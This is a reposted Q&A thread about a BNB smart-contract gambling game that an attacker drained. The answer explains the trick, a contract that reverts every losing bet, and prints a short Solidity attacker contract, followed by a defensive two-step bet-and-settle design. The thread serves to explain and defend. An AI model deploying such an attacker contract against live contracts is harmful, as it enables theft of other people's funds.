Contract balance was drained. Interesting how it was done

Question

I have just begun diving into smart contracts. And as the best way to learn, along with reading documentation and watching videos, is to create something, I decided to create a simple gambling smart contract. With a probability of 49% you'll double the amount you've sent to the smart contract.
The functions are: play, topUp and withdraw (only for the contract owner). Here is the code of the contract:

https://bscscan.com/address/0x7d4bD89A37b15D5373B9405c56CF0F18f1A0929B#code

I was aware of possible vulnerabilities like a re-entrancy attack and the function random(), which could be manipulated by miners, but as it was just a test contract and nobody knew about it, I didn't worry about it too much.
I topped up the contract balance with 0.3 BNB and made some test transactions, which you can see here:

https://bscscan.com/address/0x7d4bD89A37b15D5373B9405c56CF0F18f1A0929B

After all the tests the balance was 0.32 BNB. And then it suddenly became 0.
I started looking through the transactions list, but found nothing. Then I noticed another tab called Internal Txns. And there I noticed two transactions. The first one was exactly 0.16 BNB to my contract address, so he was expecting to win and receive 0.32 back (the whole contract balance), and he did. But as I understand it, he did it from his contract, which he had deployed just before playing. So I am very interested in exactly how it was done: whether the random() function was predicted, or whether it was a re-entrancy attack, or anything else. And I am also very interested in how he found my contract, which was deployed only about 12 hours ago. Appreciate any answers!

Interested in the exact way it was compromised.

Answer 1

Score: 1

The attacker used a contract that reverted the transaction if he didn't win. So if he had got a bad RNG, he wouldn't have lost anything (only gas fees, but he could have used the Flashbots RPC, which doesn't include reverting transactions in a block).

contract Attacker {
    address private doubleOrNothing = ...; // your contract
    address private owner = ...;  // the attacker EOA

    function play() payable external {
        // Forward the stake to the target's play() within this transaction
        IDoubleOrNothing(doubleOrNothing).play{value: msg.value}();
        // A lost bet reverts the whole transaction, stake transfer included
        if (address(this).balance < msg.value) revert();
        owner.call{value: address(this).balance}("");  // send all to owner
    }
}

It's possible that the attacker monitors all newly deployed contracts with some money in them, and checks manually if they are exploitable or something.
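A defensive counterpart to the answer above, as an added example that is not part of the original post and not the asker's contract: the stake is locked in one transaction and the outcome is decided in a later one, so a calling contract that reverts on a loss can no longer get its stake back. The names `TwoStepDoubleOrNothing`, `placeBet` and `settle` are hypothetical, and the example assumes block-hash randomness, which a block producer can still influence; it addresses only the revert-on-loss problem.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example: hypothetical contract, not the asker's deployed code.
contract TwoStepDoubleOrNothing {
    struct Bet { uint128 stake; uint64 placedAt; }

    mapping(address => Bet) public bets;
    uint256 public lockedPayouts; // reserved for open bets

    event Settled(address indexed player, bool won, uint256 payout);

    receive() external payable {} // bank top-up

    // Step 1: the stake is locked before the outcome exists.
    function placeBet() external payable {
        require(msg.value > 0 && msg.value <= type(uint128).max, "bad stake");
        require(bets[msg.sender].stake == 0, "bet already open");
        // address(this).balance already includes msg.value.
        require(address(this).balance >= lockedPayouts + 2 * msg.value, "bank too small");
        lockedPayouts += 2 * msg.value;
        bets[msg.sender] = Bet(uint128(msg.value), uint64(block.number));
    }

    // Step 2: a later transaction, callable by anyone. Reverting here only
    // delays settlement; the stake stays in the contract.
    function settle(address player) external {
        Bet memory b = bets[player];
        require(b.stake != 0, "no open bet");
        uint256 seedBlock = uint256(b.placedAt) + 1;
        require(block.number > seedBlock, "too early");

        // blockhash() returns 0 for blocks older than 256: treated as a loss,
        // so leaving a losing bet unsettled gains nothing.
        bytes32 h = blockhash(seedBlock);
        bool won = h != bytes32(0) &&
            uint256(keccak256(abi.encodePacked(h, player))) % 100 < 49;

        // Effects before the external call (re-entrancy).
        uint256 payout = won ? 2 * uint256(b.stake) : 0;
        lockedPayouts -= 2 * uint256(b.stake);
        delete bets[player];

        if (won) {
            (bool ok, ) = payable(player).call{value: payout}("");
            require(ok, "payout failed");
        }
        emit Settled(player, won, payout);
    }
}
```

An owner withdrawal function is left out; if one is added it must never pay out more than `address(this).balance - lockedPayouts`.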

huangapple
  • Published on June 8, 2023 16:50:06
  • When reposting, be sure to keep this article's link: https://go.coder-hub.com/76430137.html